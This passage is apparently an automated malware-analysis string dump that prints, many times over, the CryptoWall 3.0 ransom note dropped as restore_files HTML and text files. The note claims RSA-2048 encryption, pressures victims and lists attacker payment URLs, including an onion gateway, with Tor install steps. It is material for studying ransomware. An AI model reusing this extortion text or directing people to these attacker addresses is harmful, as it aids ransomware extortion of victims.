href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt9.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html154.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html127.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html394.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html239.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt405.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt391.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt5.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt123.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt81.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html408.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt305.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt210.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html391.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt159.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt148.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt283.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt27.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt335.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html109.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html17.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt76.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt132.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html64.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html389.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html67.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html261.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> 